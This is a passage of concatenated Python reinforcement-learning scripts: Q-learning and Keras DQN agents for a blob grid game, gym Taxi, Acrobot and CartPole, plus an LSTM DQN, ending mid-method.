EPSILON_DECAY = 0.999993 # every episode, epsilon *= EPSILON_DECAY
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy" # put here pretrained model ( if exists )
LEARNING_RATE = 0.1
DISCOUNT = 0.95
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors
COLORS = {
PLAYER_CODE: (255, 120, 0), # blueish color
FOOD_CODE: (0, 255, 0), # green
ENEMY_CODE: (0, 0, 255), # red
}
ACTIONS = {
0: (0, 1),
1: (-1, 0),
2: (0, -1),
3: (1, 0)
}
N_ENEMIES = 2
def get_observation(cords):
obs = []
for item1 in cords:
for item2 in item1:
obs.append(item2+GRID_SIZE-1)
return tuple(obs)
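# Sketch (added for illustration): get_observation() maps relative coordinates in
# [-(GRID_SIZE-1), GRID_SIZE-1] to non-negative q_table indices in [0, 2*GRID_SIZE-2]
# by adding GRID_SIZE-1. For example, with GRID_SIZE = 10 a delta of (-9, 0) becomes
# the index pair (0, 9):
assert get_observation(((-9, 0),)) == (0, 9)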
class Blob:
def __init__(self, name=None):
self.x = np.random.randint(0, GRID_SIZE)
self.y = np.random.randint(0, GRID_SIZE)
self.name = name if name else "Blob"
def __sub__(self, other):
return (self.x - other.x, self.y - other.y)
def __str__(self):
return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"
def move(self, x=None, y=None):
# if x is None, move randomly
if x is None:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# if y is None, move randomly
if y is None:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# out of bound fix
if self.x < 0:
# self.x = GRID_SIZE-1
self.x = 0
elif self.x > GRID_SIZE-1:
# self.x = 0
self.x = GRID_SIZE-1
if self.y < 0:
# self.y = GRID_SIZE-1
self.y = 0
elif self.y > GRID_SIZE-1:
# self.y = 0
self.y = GRID_SIZE-1
def take_action(self, choice):
# if choice == 0:
# self.move(x=1, y=1)
# elif choice == 1:
# self.move(x=-1, y=-1)
# elif choice == 2:
# self.move(x=-1, y=1)
# elif choice == 3:
# self.move(x=1, y=-1)
for code, (move_x, move_y) in ACTIONS.items():
if choice == code:
self.move(x=move_x, y=move_y)
# if choice == 0:
# self.move(x=1, y=0)
# elif choice == 1:
# self.move(x=0, y=1)
# elif choice == 2:
# self.move(x=-1, y=0)
# elif choice == 3:
# self.move(x=0, y=-1)
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
# q_table = {}
# # for every possible combination of the distance of the player
# # to both the food and the enemy
# for i in range(-GRID_SIZE+1, GRID_SIZE):
# for ii in range(-GRID_SIZE+1, GRID_SIZE):
# for iii in range(-GRID_SIZE+1, GRID_SIZE):
# for iiii in range(-GRID_SIZE+1, GRID_SIZE):
# q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
# the q table already exists
print("Loading Q-table")
q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
# initialize our blobs ( squares )
player = Blob("Player")
food = Blob("Food")
enemy1 = Blob("Enemy1")
enemy2 = Blob("Enemy2")
if episode % SHOW_EVERY == 0:
print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
show = True
else:
show = False
episode_reward = 0
for i in range(STEPS):
# get the observation
obs = get_observation((player - food, player - enemy1, player - enemy2))
# Epsilon-greedy policy
if np.random.random() > epsilon:
# get the action from the q table
action = np.argmax(q_table[obs])
else:
# random action
action = np.random.randint(0, len(ACTIONS))
# take the action
player.take_action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
food.move()
enemy1.move()
enemy2.move()
### for rewarding
if player.x == enemy1.x and player.y == enemy1.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == enemy2.x and player.y == enemy2.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == food.x and player.y == food.y:
# if it hit the food, reward
reward = FOOD_REWARD
else:
# else, punish it a little for moving
reward = MOVE_REWARD
### calculate the Q
# get the future observation after taking action
future_obs = get_observation((player - food, player - enemy1, player - enemy2))
# get the max future Q value (SarsaMax algorithm)
# SARSA = State0, Action0, Reward0, State1, Action1
max_future_q = np.max(q_table[future_obs])
# get the current Q
current_q = q_table[obs][action]
# calculate the new Q
if reward == FOOD_REWARD:
new_q = FOOD_REWARD
else:
# value iteration update
# https://en.wikipedia.org/wiki/Q-learning
# Calculate the Temporal-Difference target
td_target = reward + DISCOUNT * max_future_q
# Temporal-Difference
new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
# update the q
q_table[obs][action] = new_q
if show:
env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
# set food blob to green
env[food.x][food.y] = COLORS[FOOD_CODE]
# set the enemy blob to red
env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
# set the player blob to blueish
env[player.x][player.y] = COLORS[PLAYER_CODE]
# get the image
image = Image.fromarray(env, 'RGB')
image = image.resize((600, 600))
# show the image
cv2.imshow("image", np.array(image))
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
if cv2.waitKey(500) == ord('q'):
break
else:
if cv2.waitKey(100) == ord('q'):
break
episode_reward += reward
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
break
episode_rewards.append(episode_reward)
# decay a little randomness in each episode
epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
# pickle.dump(q_table, f)
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
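# Illustrative sketch (not used by the loop above): the tabular Q-learning update
# applied at each step, written as a standalone function. The new Q value is a mix
# of the old estimate and the temporal-difference target r + DISCOUNT * max_a' Q(s', a').
def q_learning_update(old_q, reward, max_future_q, lr=LEARNING_RATE, discount=DISCOUNT):
    td_target = reward + discount * max_future_q
    return (1 - lr) * old_q + lr * td_target

# e.g. q_learning_update(0, -1, 10) == 0.9 * 0 + 0.1 * (-1 + 0.95 * 10) == 0.85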
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))
# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000
# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []
for i in range(EPISODES):
# reset the env
state = env.reset()
epochs, penalties, rewards = 0, 0, []
done = False
while not done:
if random.random() < EPSILON:
# exploration
action = env.action_space.sample()
else:
# exploitation
action = np.argmax(q_table[state])
next_state, reward, done, info = env.step(action)
old_q = q_table[state, action]
future_q = np.max(q_table[next_state])
# calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
# update the new Q
q_table[state, action] = new_q
if reward == -10:
penalties += 1
state = next_state
epochs += 1
rewards.append(reward)
if i % SHOW_EVERY == 0:
print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
# env.render()
all_epochs.append(epochs)
all_penalties.append(penalties)
all_rewards.append(np.average(rewards))
EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()
print("Playing in 5 seconds...")
time.sleep(5)
os.system("cls") if "nt" in os.name else os.system("clear")
# render
state = env.reset()
done = False
while not done:
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
env.render()
time.sleep(0.2)
os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 20_000
MIN_REPLAY_MEMORY = 1_000
SHOW_EVERY = 50
RENDER_EVERY = 100
LEARN_EVERY = 50
GRID_SIZE = 20
ACTION_SIZE = 9
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=1)
elif choice == 1:
self.move(x=-1, y=-1)
elif choice == 2:
self.move(x=-1, y=1)
elif choice == 3:
self.move(x=1, y=-1)
elif choice == 4:
self.move(x=1, y=0)
elif choice == 5:
self.move(x=-1, y=0)
elif choice == 6:
self.move(x=0, y=1)
elif choice == 7:
self.move(x=0, y=-1)
elif choice == 8:
self.move(x=0, y=0)
def move(self, x=False, y=False):
# If no value for x, move randomly
        if x is False:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
        if y is False:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
RETURN_IMAGES = True
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
ACTION_SPACE_SIZE = 9
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, size):
self.SIZE = size
self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3) # 4
def reset(self):
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
self.enemy = Blob(self.SIZE)
while self.enemy == self.player or self.enemy == self.food:
self.enemy = Blob(self.SIZE)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
observation = (self.player-self.food) + (self.player-self.enemy)
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = (self.player-self.food) + (self.player-self.enemy)
if self.player == self.enemy:
reward = -self.ENEMY_PENALTY
done = True
elif self.player == self.food:
reward = self.FOOD_REWARD
done = True
else:
reward = -self.MOVE_PENALTY
if self.episode_step < 200:
done = False
else:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
        env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8)  # starts an rgb of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
env[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
# for images, expand dimension, comment if you are not using images as states
state = state / 255
next_state = next_state / 255
state = np.expand_dims(state, axis=0)
next_state = np.expand_dims(next_state, axis=0)
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
state = state / 255
state = np.expand_dims(state, axis=0)
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
if len(self.memory) < MIN_REPLAY_MEMORY:
return
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
batch_size = 64
env = BlobEnv(GRID_SIZE)
agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
ep_rewards = deque([-200], maxlen=SHOW_EVERY)
avg_rewards = []
min_rewards = []
max_rewards = []
for episode in range(1, EPISODES+1):
# restarting episode => reset episode reward and step number
episode_reward = 0
step = 1
# reset env and get init state
current_state = env.reset()
done = False
while True:
# take action
action = agent.act(current_state)
next_state, reward, done = env.step(action)
episode_reward += reward
if episode % RENDER_EVERY == 0:
env.render()
# add transition to agent's memory
agent.remember(current_state, action, reward, next_state, done)
if step % LEARN_EVERY == 0:
agent.replay(batch_size=batch_size)
current_state = next_state
step += 1
if done:
agent.update_target_model()
break
ep_rewards.append(episode_reward)
avg_reward = np.mean(ep_rewards)
min_reward = min(ep_rewards)
max_reward = max(ep_rewards)
avg_rewards.append(avg_reward)
min_rewards.append(min_reward)
max_rewards.append(max_reward)
print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
# if episode % SHOW_EVERY == 0:
# print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
episodes = list(range(EPISODES))
plt.plot(episodes, avg_rewards, c='b')
plt.plot(episodes, min_rewards, c='r')
plt.plot(episodes, max_rewards, c='g')
plt.show()
agent.save("blob_v1.h5")
import os
# the code below forces CPU usage
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 2_000
SHOW_EVERY = 500
RENDER_EVERY = 1_000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(32, input_dim=self.state_size, activation="relu"))
model.add(Dense(32, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
env = gym.make("Acrobot-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
# agent.load("AcroBot_v1.h5")
done = False
batch_size = 32
all_rewards = deque(maxlen=SHOW_EVERY)
avg_rewards = []
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
rewards = 0
while True:
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
# reward = reward if not done else 10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
agent.update_target_model()
break
if e % RENDER_EVERY == 0:
env.render()
rewards += reward
# print(rewards)
all_rewards.append(rewards)
avg_reward = np.mean(all_rewards)
avg_rewards.append(avg_reward)
if e % SHOW_EVERY == 0:
print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
if len(agent.memory) > batch_size:
agent.replay(batch_size)
agent.save("AcroBot_v1.h5")
plt.plot(list(range(EPISODES)), avg_rewards)
plt.show()
import os
# the code below forces CPU usage
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
REPLAY_MEMORY_MAX = 5000
SHOW_EVERY = 100
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# model to be built
self.model = None
self.build_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation="relu"))
model.add(Dense(24, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
self.model = model
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make("CartPole-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
done = False
batch_size = 32
scores = []
avg_scores = []
avg_score = 0
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
for t in range(500):
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
reward = reward if not done else -10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
break
if e % SHOW_EVERY == 0:
env.render()
if len(agent.memory) > batch_size:
agent.replay(batch_size)
scores.append(t)
avg_score = np.average(scores)
avg_scores.append(avg_score)
agent.save("v1.h5")
plt.plot(list(range(EPISODES)), avg_scores)
plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
DISCOUNT = 0.96
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
MIN_REWARD = -200 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 50_000
# Exploration settings
epsilon = 1.0 # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01
# Stats settings
AGGREGATE_STATS_EVERY = 100 # episodes
SHOW_PREVIEW = False
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
        Gives us 4 total movement options. (0,1,2,3)
'''
if choice == 0:
self.move(x=1, y=0)
elif choice == 1:
self.move(x=-1, y=0)
elif choice == 2:
self.move(x=0, y=1)
elif choice == 3:
self.move(x=0, y=-1)
def move(self, x=False, y=False):
# If no value for x, move randomly
if x is False:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if y is False:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
SIZE = 20
RETURN_IMAGES = False
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
# if RETURN_IMAGES:
# OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3) # 4
# else:
# OBSERVATION_SPACE_VALUES = (4,)
ACTION_SPACE_SIZE = 4
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, n_enemies=7):
self.n_enemies = n_enemies
self.n_states = len(self.reset())
def reset(self):
self.enemies = []
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
for i in range(self.n_enemies):
enemy = Blob(self.SIZE)
while enemy == self.player or enemy == self.food:
enemy = Blob(self.SIZE)
self.enemies.append(enemy)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
# all blob's coordinates
observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
# set the reward to move penalty by default
reward = -self.MOVE_PENALTY
if self.player == self.food:
# if the player hits the food, good reward
reward = self.FOOD_REWARD
else:
for enemy in self.enemies:
if enemy == self.player:
# if the player hits one of the enemies, heavy punishment
reward = -self.ENEMY_PENALTY
break
done = False
if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
        env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8)  # starts an rgb of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
for enemy in self.enemies:
            env[enemy.x][enemy.y] = self.d[self.ENEMY_N]  # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
env = BlobEnv()
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when training multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, state_in_image=True):
self.state_in_image = state_in_image
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
# get the NN input length
model = Sequential()
if self.state_in_image:
model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES)) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
else:
# model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
